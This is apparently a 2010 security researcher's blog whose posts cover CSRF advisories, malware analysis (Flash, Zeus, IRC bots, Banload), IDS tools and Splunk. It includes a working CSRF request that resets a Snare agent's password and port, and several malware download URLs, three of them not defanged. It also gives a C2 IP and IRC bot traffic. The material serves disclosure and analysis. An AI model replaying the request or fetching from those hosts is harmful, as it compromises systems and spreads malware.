Exploiting CSRF is really not complicated at all, but it has been historically difficult to discover via automated scanning (sorry, Kevin ;-). There are nuances that require fairly significant manual interaction with a potentially vulnerable application; enumeration and parameter reconnaissance is required, followed by building forms specific to various POST requests. Consider Tamper Data your bff for this effort. Most importantly, noting the lack of a token/formkey/canary is generally the first, best step to determining CSRF vulnerability with targeted manipulation thereafter.

Of the 155 CSRF disclosures mentioned in Kelly's article for the first half of 2010, 14 are advisories I submitted through Secunia and are widely varied in their scope.
You'll note the expected vulnerable CMS platforms, but you'll also find HP printers, server logging agents, system management interfaces, and web mail providers.

My point is this, CSRF is not hard to find, is easy to exploit, and often remains unrepaired in web applications long after the other OWASP Top 10 biggies have been fixed.
Token up, people!

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Everybody Loves REMnux

2010-09-05T12:52:00.001-07:00

A quick read of the SANS Forensics blog, courtesy of Gregory Pendergast, and you'll get a feel for all the positive feedback for Lenny Zeltser's REMnux.
Lenny has dedicated himself to furthering the malware reverse engineering cause, both as a teacher and analyst; his SANS courses are popular for good reason.

September's toolsmith covers REMnux and offers some detail specific to its use.

One area I often use REMnux for is malicious Flash analysis.
Evil Flash, distributed in particular via online advertising platforms, is a constant concern for online providers. Suffice it to say that my team has encountered such problem children more than once. ;-)
As an example, an older sample (MD5: 525445764564B34070CF2F9DCC6C2DAA) makes for a great test case. You can grab the sample for your own testing at OffensiveComputing.net.
Imagine you've grabbed the sample via wget from your REMnux VM, after proxy-based analysis of the malicious URL.
A simple check for interesting results might be the likes of
flasm 525445764564b34070cf2f9dcc6c2daa.swf, which would result in a .flm file named identically for SWF file analyzed. Figure 1 shows the concatenated results.

Figure 1

While flasm is convenient, the preferred method would be
swfdump -Ddu 525445764564b34070cf2f9dcc6c2daa.swf
The -D switch provides full (everything) output, the -d switch prints the hex output, and -u shows the Tag IDs.
Figure 2 offers the results.

Figure 2

Note that that the DEFINEBUTTON2 config for Tag ID 4 grabs an URL then issues the ActionScript FSCommand:exec to execute arquivo.scr (never a good thing).
Tag ID 4 was conveniently named "bot" by its creator; why bother hiding, right?

With a modicum of effort, maliciousness confirmed, you're ready to take action: report the malicious SWF to the provider, or remove it you are the provider.

You'll enjoy REMnux; it's an excellent collection of useful tools gathered in a simple but functional distro.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Is Zeus an APT, or v3?

2010-08-22T13:35:00.002-07:00

I've given a few presentations this past year regarding security visualization where I have implied for all intents and purposes that Zeus (or Zbot) can be considered part of the advanced persistent threat (APT) picture.
As I prepared for the most recent presentation to the ISSA Puget Sound chapter meeting I contemplated the premise of Zeus-as-APT a bit further, and also found myself amused by the implication that there was now a Zeus v3.

Let me first debunk the v3 claims.
The Zeus hype over the last few weeks has been off the charts given a brilliant marketing campaign from M86 who, in their latest white paper, have gone so far as to refer to certain Zeus variants as Zeus v3.
Quite simply, I disagree.
The M86 white paper states that "Zbot/Zeus v3 version is an evolved mutation of Zbot 2. Unlike the older version, this one focused specifically on online banking."
If this is the basis for declaring the samples analyzed for this white paper as v3 I must cry foul.
As an example, Figure 1 includes content from a Zeus v1 (yes v1, not even v2) config file that clearly targets online banking, specifically Wells Fargo. The MD5 hash for this sample is 3cfc97f88e7b24d3ceecd4ba7054e138 if you wish to confirm for yourself.

Figure 1

The Zeus version transition from v1 to v2 was born of the inclusion of code signing, advanced encryption methods, and licensing (one install per registered user, please). Either way Zeus has long targeted online banking and does not warrant new version nomenclature on this premise alone. I'll grant that mutations and variations are rapid amongst Zeus samples, with particular goal of avoiding detection, but in my opinion it's still the same v2 code-base.

While a bit more difficult to de-obfuscate, a recent Zeus v2 sample showed clear signs of classic Zeus behavior and targeted a mass of online banking offerings.
Figure 2 offers a small subset of targeted institutions pulled directly from the config file.
The MD5 hash for this sample is d86ba734b30c650b091dd39e7707872c and you can pull the sample for your own analysis from ZeuS Tracker.

Figure 2

As per the "Is Zeus an APT?" question, I have mixed feelings here.
I've recently read two excellent discussions on the matter that offer slightly different perspectives.

In Dr. Eric Cole's Advanced Persistent Threat: The Insider Threat, posted to Dark Reading on Aug 16th, he is very precise in his definition of APT:
"The entry point with many attacks is focusing on convincing a user to click on a link. However, once the APT breaks into a system, it is very sophisticated in what it does and how it works. Signature analysis will be ineffective in protecting against it. Advanced attacks are always changing, recompiling on the fly, and utilizing encryption to avoid detection."

Gary Hoglund's The shadowy world of the advanced persistent threat and botnets, posted to SC Magazine on July 15 offers a slightly different take:
"…botnets traditionally were not associated with state-sponsored attacks (sometimes called advanced persistent threats, or APT). While that characterization may have worked five years ago, it is completely outmoded for today's threat landscape. Botnets have evolved to become generic remote-access frameworks."

Dr. Cole further states that "stealth and being covert are the main goals of today's attacks. APT's goal is to look as close {if not identical} to legitimate traffic. The difference is so minor that many security devices cannot differentiate between them."

Zeus clearly communicates via "legitimate traffic", isn't noisy, and goes to great lengths to disguise itself.

Hoglund also points out that Zeus "has a plugin architecture, so any capability is possible. The base source code of Zeus readily is available, and attackers can easily customize the system for any purpose. There are hundreds of custom variations of Zeus in operation today.”

Following the sound logic from both of these gentlemen, Zeus is a bot used for APT-like attacks. While it may not often be used in very narrow, highly specific attacks (not to say that it isn't), it is certainly used in a very targeted fashion.
Attackers simply drop the C&C mechanism on hacked web server (see Figure 3), target a specific victim set, and collect data until shutdown, where after the move on.

This morning's RSS headlines included a most troubling reference from TrendMicro detailing Zeus being utilized for a deeply nefarious and specific purpose: targeting US military personnel bank accounts.
While this may be a broad victim audience, it's still targeted specifically to Bank of America Military banking users.

So is Zeus an APT? If not, it certainly partially qualifies; call it pseudo-APT.

Let me know what you think, of both the Zeus-as-APT debate as well as the M86-driven Zeus v3 ambiguity. Comments welcome.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Suricata in toolsmith: meet the meerkat

2010-08-03T14:18:00.000-07:00

Rather than fan the Suricata versus Snort flames (you're both great kids and I love you equally) I'm opting for Swiss-like neutrality and simply invite you to explore Suricata at length.
See Victor Julien's post on the matter as he sums it up succinctly.
While I've always been a Snort user, I've also long been an ardent supporter of Matt Jonkman's Emerging Threats. Given his logical progression towards the Open Information Security Foundation (OISF), a "non-profit foundation organized to build a next generation IDS/IPS engine", I felt deeply obligated to cover Suricata in toolsmith.

Suricata: An Introduction is my effort to oblige.

While this article is painfully introductory, it should whet your appetite.
Suricata, as the "product" of OISF, is compelling on different fronts.

1) Intent: "OISF’s primary goal is to remain on the leading edge of open source IDS/IPS development, community needs and objectives."
As such, Suricata "is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field."
Committing to community needs and objectives, much as Emerging Threats has, is noble and valuable.

2) Scale: My testing on a dual core box matches Victor's assessment.
"Is Suricata faster than Snort on a single core cycle for cycle, tick for tick? No. But we scale. We’ve had reports of running on a 32 core box and scaling to use all cores. There Suricata is much faster."
I believe performance at scale is essential/vital/critical to IDS/IPS success in this burgeoning age of all things cloud and virtual (think complexity, and mondo network traffic). Groundbreaking thinking on my part, I know. ;-)
Consider that an unnamed military body has tested Suricata versus Snort on a large scale platform (24 processors and 128GB of RAM) and saw a very clear 6-fold speed increase over a tuned Snort implementation on the same platform.

3) HTP Library: In a context similar to all things cloud (online services), effective HTTP normalization and parsing is mighty important. Ivan Ristic's HTP Library endeavors to provide "very advanced processing of HTTP streams for Suricata."

4) Features: I'll let the comparison chart speak for itself.

Performance geeks will definitely want to explore the use of PF_RING and leveraging CUDA-capable hardware. The article clarifies these a bit more.

5) Same rules (Snort-based): Need I say more?

These should be ample reasons for you to give Suricata a really close look.
Deploy it.
Give it every opportunity to prove itself side by side with your current IDS/IPS solution.
Keep an eye on the project site, and get involved.
Start by downloading 1.0.1 here.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Verizon Data Breach Report & OWASP Top 10's #6

2010-07-29T09:28:00.000-07:00

The fact that Computerworld's Jeremy Kirk just reported that data breaches are often caused by configuration errors (as noted in Verizon's latest data breach report) should come as no surprise, yet I'm left shaking my head in continued disbelief at this issue's prevalence.

Per Jeremy, as summarized from the report:
"Verizon said it found that a surprising and "even shocking" trend is continuing: There are fewer attacks that focus on a software vulnerabilities than attacks that focus on configuration weaknesses or sloppy coding of an application."

Now we now why security misconfiguration is new to the OWASP Top 10 as of 2010, holding the #6 position.
Consider Figure 1 as ripped right from the OWASP Top 10 doc.

Figure 1

Can we agree that data breach qualifies as a "business impact"?

A recent example of classic security misconfiguration includes the design flaw in WordPress that, by default, allowed users to set up permissions that let anyone read their blog's wp-config.php configuration file; WordPress stores the bloggers' credentials in plain text (also OWASP Top 10 A9).
An attacker could create a scanner to locate all configuration files containing incorrect permissions, read database credentials, and compromise all found.

Figure 2

So easily avoided.

OWASP's recommendations include:
1. A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Dev, QA, and production environments should all be configured the same. This process should be automated to minimize the effort required to setup a new secure environment.
2. A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment.
3. A strong network architecture that provides good separation and security between components. Consider running automated scans periodically to help you detect future misconfiguration or missing patches.

Make it so!

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

ISSA Members: Connect regarding IR in cloud & complex environments

2010-07-28T07:26:00.000-07:00

If you're an ISSA member please feel free to join the conversation on ISSA Connect regarding incident response challenges in highly complex, massive network volume, and/or cloud environments.
This discussion sets up a presentation I'll be giving at the ISSA International Conference on September 17, 2010 in Atlanta. Hope to see you there.
I have recommendations regarding tooling and methodology that I'll be sharing at the conference, but I'm really interested in hearing about your experiences under similar circumstances. What's worked for you and what hasn't?
Folks working for sizable online service providers, ISPs, cloud or SaaS providers, and have had some noteworthy technical challenges or experiences, you're the folks I'd like to hear from.
If your not an ISSA member feel free to comment here or email me (russ at holisticinfosec dot org).

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Messenger Abuser Malware Tactics

2010-07-19T22:00:00.000-07:00

A common trend I see in both research and job duties is the use of instant messaging services to propagate malware.
"OMG, Russ," you say, "groundbreaking!" I know, I know.
This is all about tactics and trends.
Pushing malware through URLs sent over instant messaging should surprise no one who spends anytime in the infosec space, but once in awhile I spot persistent methods that are, if nothing else, relentless in their pursuit of victims.
You know the vector. A URL pops up in the IM client, victim clicks, off to the races.

With the vast popularity of social networking services, one obvious trait includes Facebook-oriented nomenclature where a URL and attacker domain might include the likes of hxxp://www.facebook.otsima.com/facebook_gallery.php?img=DSC004075208450.JPG.
"Look, Ma! It's from my Facebook friend! It's gotta be safe!" Uh-huh.
What's been interesting lately has been the number of executables that are named as image files; most often JPG as seen above.
Said sample above is Backdoor.Win32.Gootkit.

Another one following this pattern lately was found at hxxp://www.e-egypt.net/watch.php?=FOTO3436812.JPG.
A recent sweep for the string as part of this analysis found it referenced in the following:
hxxp://www.fuckyoutube.org/watch.php?=FOTO3436812.JPG (suspended)
hxxp://www.imagewhat.com/pictures/watch.php?=FOTO3436812.JPG (suspended)
Inevitably, they're served from a hacked server too, as seen on e-egypt.net; when explored at it's root offers Figure 1.

Figure 1

The binary disguised (thinly) as FOTO3436812.JPG is an unspectacular IRC bot with a tenacious master, given the numerous URL variants pointing to the same sample.
A quick run through ye olde sandbox produces a PCAP and behavioral analysis that indicates classic IRC behavior; again, very typical stuff known in some circles as the LolBot. But the bad guy (or so it seems) was nice enough to leave his "Facebook badge" on the server that the initially executed package calls home to for additional downloads. One directory jump up from where said additional download resides and you have Figure 2 (anonymized to protect the miscreant).

Figure 2

Nice, nothing like putting a face with your malware. ;-)

How about the endless VBTrojan malware served up with a bit of Brazilian (calls home to 200.98.197.93) spice via the file name MsnWebcawOnFiles1634.com (see the trend?):
http://msnfiles-webshow.serveftp.com
http://webmsn-fileshowrum.serveftp.com
http://webcawmsn-showrum.serveftp.com
The strings references include "desconhecido" ("unknown" or "strange" in Portuguese) and C:\Arquivos de programas. ;-) Beware the arquivos!

My favorite of late has been this one pushed behind a TinyURL.
This one was pretty good and there's very little detection for the binary yet.
The shortened version:
hxxp://www.tinyurl.com/DSC488398JPG (I love the DSC nomenclature like it just came off a phone or digital camera).
Redirect is to hxxp://03161b8.netsolhost.com/index.html, but the catch here is that index.html is actually the binary.
I have to say, I hadn't seen that one used before in this context. The trickery is improving.
But alas, it's still just an IRC bot:
NICK new[USA|XP]8092826
USER s "" "lol" :s
:001 irc.priv8irc9.com
Remember I mentioned the LolBot above with regard to a different sample?
Give it a few days. Once the detection is up to speed for this variant I'm reasonably certain we'll see it classified as Lol/Buzus/Panadol.
I'll take bets: the hash for index.html is 2B4B55CE4A991DBD9600246C7F9E080D.
We'll see if my neanderthal-like ability to spot trends holds water. ;-)

Like I said, what's old is new again. But maybe, just maybe, you learned something useful reading this far.

Sorry it's been a few weeks...busy, busy.
Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

CSRF flaws that pack a punch

2010-06-28T18:47:00.000-07:00

Note: These findings were responsibly disclosed and vendor updates have been issued.
See the eBbox Platform advisory here and the Snare advisory here.

A year after DEFCON 17, cross-site request forgery (still one of my favorite bugs) continues to present itself in some mighty interesting places.
I've already talked about it in the likes of wireless routers, UPS units, and a variety of web apps.
But it gets more sketchy when the vulnerable application gives up the keys to the castle via CSRF.
I don't mean just admin rights to the app, I mean compromise leading to control of the OS or platform itself.
Before I go into detail please know that both vendors in question responded instantly, provided fix time-lines, and met them precisely with corrective updates.
Two cases in point, keeping in mind that CSRF is often referred to as the one-click attack.
First, eBox Platform.
eBox Platform describes itself as a catchall that can act as a Gateway, Infrastructure Manager, Unified Threat Manager, Office Server, Unified Communication Server or a combination of them. One single, easy-to-use platform to manage all your network services.
Er, or one really broad attack surface.
Give away all that power to one tiny code snippet.

Figure 1

Failure to tokenize requests to the application means successful compromise with one errant victim click. Sending a halt order as seen in Figure is but a pittance as any request submitted via the browser-driven web management interface can be maliciously manipulated.
Preventing this attack clearly should be prioritized by developers; CSRF is number six in the OWASP Top 10 for a reason.

Next on our list: Snare from InterSect Alliance.
From their website: Snare for provides front end filtering, remote control, and remote distribution for audit log and event log data.
One agent to rule them all; one CRSF bug to rule all agents.
Meh.
Even though the web app for the Snare client can be configured with a password and localhost restrictions, an attacker need only convince a victim to click a link; it's simple GET request CSRF to finish the job.
http://192.168.248.231:6161/setremote?str_RestrictIP=192.168.248.235&dw_Password=on&str_Password=password&dw_PortChange=on&dw_WebPort=84
This request resets the password and the port, restricts IP access as well (in case you couldn't tell ;-)) and, as an example, via Snare for Windows, allowing the attacker to dump local users, domain users, registry, etc. On the likes of an AIX system add "remote control, and remote distribution for AIX audit data, interfacing with the underlying AIX audit subsystem as a custom stream object."
Scary.

eBox has issued the following fixes:
The problem can be corrected by upgrading your system to the
following package versions:

eBox Platform 1.4:
ebox 1.4.7-0ubuntu1~ppa1~hardy1
libebox 1.4.5-0ubuntu1~ppa1~hardy1
ebox-remoteservices 1.4.7-0ubuntu1~ppa1~hardy1

Snare has issued the following fixes:
SnareWindows - 3.1.8
SnareWindowsVista - 1.1.5
SnareAIX - 1.5.1
SnareIrix - 1.4.1
SnareSolaris - 3.2.4
EpilogWindows - 1.5.4
EpilogUNIX - 1.3

Typical recommendations apply.
For system owners, be on the lookout for vulnerabilities of this nature as you make use of convenient web-based system management interfaces such as eBox and Snare.

For vendors, make use of SDL or SDLC methods, and mitigate these risks in advance of release.

Convenience and efficiency are critical to success in enterprise computing environments, but with great power comes great responsibility. ;-)
Cheers.

ADMIN Magazine article: Splendid Splunk

2010-06-27T20:58:00.000-07:00

Approximately twice a year I write for Linux Magazine; I've covered nUbuntu, Adeona, and Security Visualization in previous articles.
When the editor asked me to participate in a system administration special edition I was intrigued as the edition was to be OS agnostic and include Linux, Windows, OpenSolaris, and others.
I didn't have to think for more than a minute to come up with a good security topic for system administrators.
Any of you readers work in hybrid operating environments where you're inevitably challenged to unify event monitoring and correlation with disparate systems?
I for one can answer that question in teh affirmative and am always seeking ways to answer that challenge.
Merging security and operational mindsets is essential when unifying events in hybrid environments and I have found Splunk to be incredibly useful as part of the effort.
Note: I wrote this article with no influence or feedback from Splunk (they'll learn of it here too) to avoid bias.
Splendid Splunk: Unifying Events with Splunk is the result of much testing and research to prove out methodology I've only implemented in part prior.
For security events, when an enterprise may not have budget for SEM/SIEM, the likes of Splunk fills the gap admirably. Yes, it's a commercial tool, but one can do a great deal with the community version to confirm my findings.

An excerpt:

Systems administrators, security engineers, and analysts share a common challenge in typical enterprise environments. Rare is the data center in which only one operating system is in use, or only one version of the same operating system. Monitoring and managing system events and security events across such hybrid environments is no small feat...choices need to be made when unifying events in a hybrid environment. For example, perhaps you have more of one operating system flavor than another in your environment. Or, perhaps you prefer one operating system over another.
No matter what your system counts, preferences, or comfort zones, Splunk can serve you well...to monitor your systems you can choose to use various channels in concert or exclusively:
• Both host types can also run Splunk as a light-forwarding agent.
• Windows and *nix hosts can also be monitored with Snare agents.
• Windows and *nix hosts can be monitored with OSSEC agents.
• Network devices can send syslog output directly to the Splunk server.
Depending on granularity, performance, and primary business driver, you can opt for some or all of the above. Personally, I tend to favor a combination of the Splunk light-forwarding method in concert with OSSEC agents, and syslog for network devices...

I cover methodology, installation, forwarding, Snare, OSSEC, searches dashboards, and alerting.
While there's a book's worth of Splunk use to write about, the article is intended to help you get a good running start.

ADMIN Magazine is available via subscription (quarterly with DVDs), single issue purchases online, or at magazine stands in the likes Barnes and Noble.

If the article is ever posted to the web by the publisher I'll update this post and let you know.
That said, the publication is well worth the coin as it covers network security, system management, troubleshooting, performance tuning, virtualization, and cloud computing.
Happy reading; let me know if you have questions.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Book Review: ModSecurity Handbook

2010-06-06T11:14:00.000-07:00

In January I reviewed Magnus Mischel's ModSecurity 2.5.
While Magnus' work is admirable, I'd be remiss in my duties were I not to review Ivan Ristic's ModSecurity Handbook.
Published as the inaugural offering from Ristic's own Feisty Duck publishing, the ModSecurity Handbook is an important read for ModSecurity fans and new users alike. Need I remind you, Ristic developed ModSecurity, the original web application firewall, in 2002 and remains involved in the project to this day.
This book is a living entity as it is continually updated digitally; your purchase includes 1 year of digital updates. Ristic also wants to know what you think and will incorporate updates and feedback if relevant.

While the ModSecurity Handbook covers v2.5 and beyond, Ristic's is "the only ModSecurity book on the market that provides comprehensive coverage of all features, including those features that are only available in the development repository."
ModSecurity Handbook offers detailed technical guidance and is rules-centric in its approach including configuration, writing, rules sets, and Lua. Your purchase even includes a digital-only ModSecurity Rule Writing Workshop.

Chapter 10 is dedicated to performance as proper tuning is essential to success with ModSecurity without web application performance degradation.
That said, the highlight of this excellent read for your reviewer was Chapter 8, covering Persistent Storage.
ModSecurity persistent storage is, for all intents and purposes, a free-form database that helps you:
• Track IP address and session activity, attack, and anomaly scores
• Track user behavior over a long period of time
• Monitor for session issues including hijacking, inactivity timeouts and absolute life span
• Detect denial of service and brute force attacks
• Implement periodic alerting

Following the applied persistence model, I found periodic alerting most interesting and useful. From pg. 126, "Periodic alerting is a technique useful in the cases when it is enough to see one alert about a particular situation, and when further events would only create clutter. You can implement periodic alerting to work once per IP address, session, URL, or even an entire application."
This is the ModSecurity equivalent of a Snort IDS rule header pass action useful when internal vulnerability scanners might cause an excess of alerts.
ModSecurity rules that perform passive vulnerability scanning might detect traces of vulnerabilities in output, and alert on them. Periodic alerting would thus only alert once when configured accordingly.
As an example, perhaps you are aware of minor issues that are important to be aware of, but do not require an alert on every web server hit.
Making use of the GLOBAL collection, ModSecurity Handbook's example would translate the scenario above by following a chained rule match and defining a variable, thus telling you if an alert has fired in a previously. The presence of the variable indicates that an alert shouldn’t fire again for a rule-defined period of time. In concert with expiration and counter resets it is ensured that a rule will warn you only once in a your preferred period of time but still log as you see fit too.
Useful, right?

ModSecurity Handbook, in concert with Ristic's Apache Security, are must reads for web application security administrators and architects, but will not leave those who need step-by-step instructions at a loss.
Trust me when I say, all you need to harden your web presence with ModSecurity is at your fingertips with the ModSecurity Handbook.

Cheers and happy reading.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Web Security Tools²: skipfish and iScanner

2010-06-03T13:34:00.000-07:00

June's toolsmith in the ISSA Journal covers skipfish and iScanner.

Skipfish and iScanner, albeit quite different, are both definite additions for your toolkits.
Reduction of web application security flaws as well as the identification and removal of obfuscated malcode are important ongoing processes as part of your proactive and reactive defensive measures.

Skipfish is an “active web application security reconnaissance tool that prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.”

iScanner is a Ruby-based tool that “detects and removes malicious code and webpages malware from your website with automated ease. iScanner will not only show you the infected files from your server but it’s also able to clean these files by removing the malware code from the infected files.”

The article awaits your review here.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

CSRF: Six Degrees of Kevin Beaver (or at least his printer)

2010-05-11T20:32:00.000-07:00

Perhaps you followed the CSRF debate between RSnake and Kevin Beaver last month.
While I fall well on Robert's side of the tracks, Kevin made some interesting points.
I may take issue with some of them (ok, almost all of them) but Robert took him to task, and I'm pretty sure Kevin has done his penance ;-), so no need to beat that dead horse.
Except that scanner comment. Scanners <> CSRF detection; it's a largely manual check, and it actually does exist significantly more often than you might think (pretty much everywhere). Watch your Tamper Data or Burp sessions for requests made without tokens/formkeys/canaries, etc. and you'll soon know what I mean. There is no "high-quality vulnerability scanner" that will solve the CSRF challenge for you.

No matter your view or perspective, CSRF is pervasive, annoying to fix, and still lurking everywhere; it can be used to pwnzor your printer, your APC UPS, your website's shopping cart or CMS, or any other damned thing you expose to the Intarwebs that fails to check "exposure to unintended requests."
What value these targets? Depends on your motive.
Stealing printer resources? Probably not. ;-)
But a CSRF attack against a website operator who's using the likes of osCommerce, Zen Cart, or eclime (15 million+ at last check) and is foolish enough to be using one of them to manage credit card data? Game over.

Heck, CSRF vulns are so widespread that we could rate number 5 on the OWASP Top 10 like a video game...Rated E for Everyone, just like your Mom. Ohhh!

When I popped my new HP Photosmart C4700 on my home network and changed the admin password via CSRF with twenty second's worth of HTML, it all came to a head.
How do you patch that?
Vendors like HP and APC, who are extremely responsive to disclosures, no matter how low hanging the fruit, still can't easily update their software and expect all customers to apply the fix.
Then there all the vendors who do nothing (you know who you are).
Good code and responsible vendors are paramount, but so too is consumer awareness and understanding of risk.
What if a properly targeted "one click" attack turns off the power outlets on a UPS device with a hospital's ICU servers connected to it?
Is life in the balance?
Our "mysterious" web bug changes the nature of that very question.
Overly dramatic, sure, but you get the point.
Who'd be to blame under those circumstances?

So what's the solution (write secure code)?
I recognize that I'm asking more questions than providing answers (write secure code), but I'm at a loss as to how to solve poor coding practices easily (write secure code). Perhaps you, dear reader, have some ideas (write secure code).

Maybe RSnake should just CSRF Kevin Beaver's printer, force it to print a bunch of copies of OWASP's Development Guide, and we'll call it good. ;-)

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Memory forensics with SIFT 2.0, Volatility, and PTK

2010-05-03T20:02:00.000-07:00

May's toolsmith takes a close look at SIFT 2.0, the forensics workstation associated with the SANS 508 track.

SIFT 2.0 is best utilized as a VM via your preferred version of VMWare but can also be installed as a permanent standalone workstation.
I spend much of time touting memory analysis as a key component of incident response and forensics, and SIFT 2.0 offers two of the most capable memory analysis offerings available: Volatility and PTK. As I say in the article, I don't do either tool the justice it deserves but it should whet your appetite. I owe both Volatility and PTK their own write-ups, if not the MoonSols Memory Toolkit as well.
Regardless, SIFT 2.0 is extremely practical for forensic processing and case management. Assuming you have a decent storage footprint, you can opt to keep a unique virtual instance of SIFT for each case your handling.
For this article I used SIFT with Volatility and PTK to dig more deeply into a victim memory image of a Banload-infected host.
You'll quickly see how to get right to the bottom of an incident using only memory analysis.
The article is here.

Cheers and and enjoy.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

I am a narcissistic vulnerability pimp

2010-04-25T16:35:00.000-07:00

The Verizon Business Security Blog has drawn the line in the sand of the kitty litter box they're apparently playing in, labeling those who irresponsibly disclose "information that makes things less secure" as narcissistic vulnerability pimps.
Wow.
Time to pull those iPhone wannabes from betwixt the Verizon lily whites and dial 1-866-GET-CLUE.
I love it when risk "experts" start sounding off about that of which they know nothing.
As members of the Verizon Risk Intelligence group, clearly an oxymoron, Wade Baker and Dave Kennedy must be the same guys who describe risk level in the cloud as .4.
What?
Here's a secret.
Vulnerability disclosure is, as Robert Graham says, rude at its core.
"Hey Mr. Vendor, your code sucks, fix it."
But what about when Mr. Vendor decides to blow off the security researcher who tried on numerous occasions, via numerous channels to disclose a vulnerability?
So when that security researcher goes public after vendor FAIL, he's now a narcissistic vulnerability pimp?
Is Charlie Miller a security researcher or a narcissistic vulnerability pimp?

Attrition.org (d2d) recently summed this conundrum up succinctly:
"So what is actually responsible or ethical? The lines are blurred quite a bit. The "responsible" method is also the "painful", "expensive", and often "ineffective" method that gets little resolved for exponentially more work, time and money. Is all that waste not irresponsible? What about all of the other organizations unknowingly affected by things I've found, organizations who never got a heads-up, no less a patch, because my attempts at "responsible" disclosure failed?"

No matter how you define it, disclosure drives vendors to repair code they would otherwise neglect and leave vulnerable for the real criminals to exploit.
Yes, risk may be elevated in the time period between disclosure and repair, as well as repair and patch deployment. But if researchers wait on the likes of Oracle to fix their kluges, nothing would ever get fixed.

Dan Goodin says in his writeup, "as the recent Pwn2Own contest made abundantly clear, software makers can't be counted on to secure their products, at least not on their own."
Dan clearly be styling some bling of his own.

I at Holisticinfosec.org do hereby resolve to faithfully ignore Verizon Risk Intelligence dreck forthwith.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Moral Hazard: URL shorteners must improve malware prevention

2010-04-18T18:58:00.000-07:00

Suffice it to say that my job duties include trying to help reduce malicious URLs being transmitted over Windows Live Messenger.
As you can likely imagine, URL shorteners (TinyURL, Bit.ly, etc.) give me conniptions.
Blocking the root domain is not feasible as the majority of URL shortener use is not malicious.
Can you say "whack-a-mole"?
Bit.ly, as an example, claims to be scanning URLs for malware, but with 40 million plus shortened URLs a day, they are definitely missing their share of malware-lade URLs.
TinyURL suffers from the same challenges; even though they have a strict Terms of Use, endless malicious URLs are shortened via TinyURL who seems to only employ a reactive prevention model (report it and they'll remove it).
Thus, topping the list of URLs being passed via Messenger on any given day is often the likes of tinyurl.com/y6v689z.
Click and a Russian free web host offers you fotos16.com, a Trojan-Downloader.Win32.Banload variant.
What's old is new again (first detected in 2006), but no less effective when coupled with simple social engineering. Simply, the Banload Trojan downloads other Trojans and aims to steal your banking credentials.
The victim receives an IM, often from a trusted contact, that evokes Facebook content: "Hey, check out my latest Facebook pics!" No shocker there, someone targeting popular Internet resources as part of their attack methodology? Groundbreaking.
But you know what? It works over and over and over again.
All day long.
Until the cows come home.
So what does our shortened URL with a social networking lure get us?
All sorts of bonus goodies.
This sample helped remind me of how much I love NetworkMiner.
Thrash my trusty Windows XP VM, capture the network traffic, and voila, we quickly learn all we need to know.
Our Banload friend got busy in the 80 seconds I let it run in my home lab environment.
14 sessions, 23 DNS queries, 11 file downloads, and three authenticated (credentials captured as they are passed in the clear) SMTP exchanges with Brazilian free mail hosts.
Gotta have somewhere to send all those stolen credentials right?

Soapbox time.
I liken the failure of URL shortening providers to better protect users from malware to a moral hazard.
A moral hazard is "the lack of any incentive to guard against a risk when you are protected against it (as by insurance)."
A strongly worded Terms of Use does not indemnify the likes of Bit.ly, TinyURL, and others.
Too many people are getting pwnzored.
Better efforts to prevent malicious abuse of URL shortening services must ensue.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Dradis: Effective Information Sharing for Pentest Teams

2010-04-02T10:13:00.000-07:00

April's toolsmith covers Dradis.
Dradis is a self-contained web application that provides a centralized repository for information acquired during testing in order to work completed and pending.
The Dradis project lead, Daniel Martín Gómez contends (and I agree) that failure to share “information available in an effective way will result in exploitation opportunities lost and the overlapping of efforts.”
Testing teams face multiple challenges specific to information sharing, including a variety of output types from all the tools utilized.
Testers gather results in different ways.
Each team generates different reports, and so on.
Dradis is designed to address these challenges and does so effectively.
Check it out at your earliest convenience.

The article awaits your review here.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Malware behavior analysis: studying PCAPs with Maltego local transforms

2010-04-01T09:37:00.000-07:00

In recent months I've made regular use of Maltego during security data visualization efforts specific to investigations and analysis.
While Maltego includes numerous highly useful entities and transforms, it does not currently feature the ability to directly manipulate native PCAP files.
This is not entirely uncommon amongst other tools, particularly those specific to visualization; often such tools consume CSV files.

With thanks to Andrew MacPherson of Paterva for creating these for me upon request for recent presentations, I'm pleased to share with you Maltego local transforms that will render CSVs created from PCAP files. Simple, but extremely useful.

I'll take you step by step through the process, starting with creating CSVs from PCAPs.
For those of you already comfortable with PCAP to CSV conversion and/or using local transforms with Maltego, here are the pyCSV transforms:

GetSourceClients.py
GetDestinationClients.py

All others, read on.
Raffael Marty's AfterGlow (version 1.6 just released) includes tcpdump2csv.pl which uses tcpdump/windump to read a PCAP file and parse it into parametrized CSV output.

Windows users, assuming that Perl is installed and all files and scripts reside in the same directory, execute:
windump -vttttnnelr example.pcap | perl tcpdump2csv.pl "sip dip dport" > example.csv.

Linux users:
tcpdump -vttttnnelr example.pcap | tcpdump2csv.pl "sip dip dport" > example.csv

To integrate the pyCSV local transforms with your Maltego instance:
1. Click Tools, then Manage Transforms.
2. Click New Local Transforms.
3. Define the Display name as the name of the local transform. Example: GetSourceClients
4. Each transform must map to an entity. Do so as follows for
each transform as you create it:
getSourceClients to Phrase
getDestinationClients to IP Address
5. Click Next.
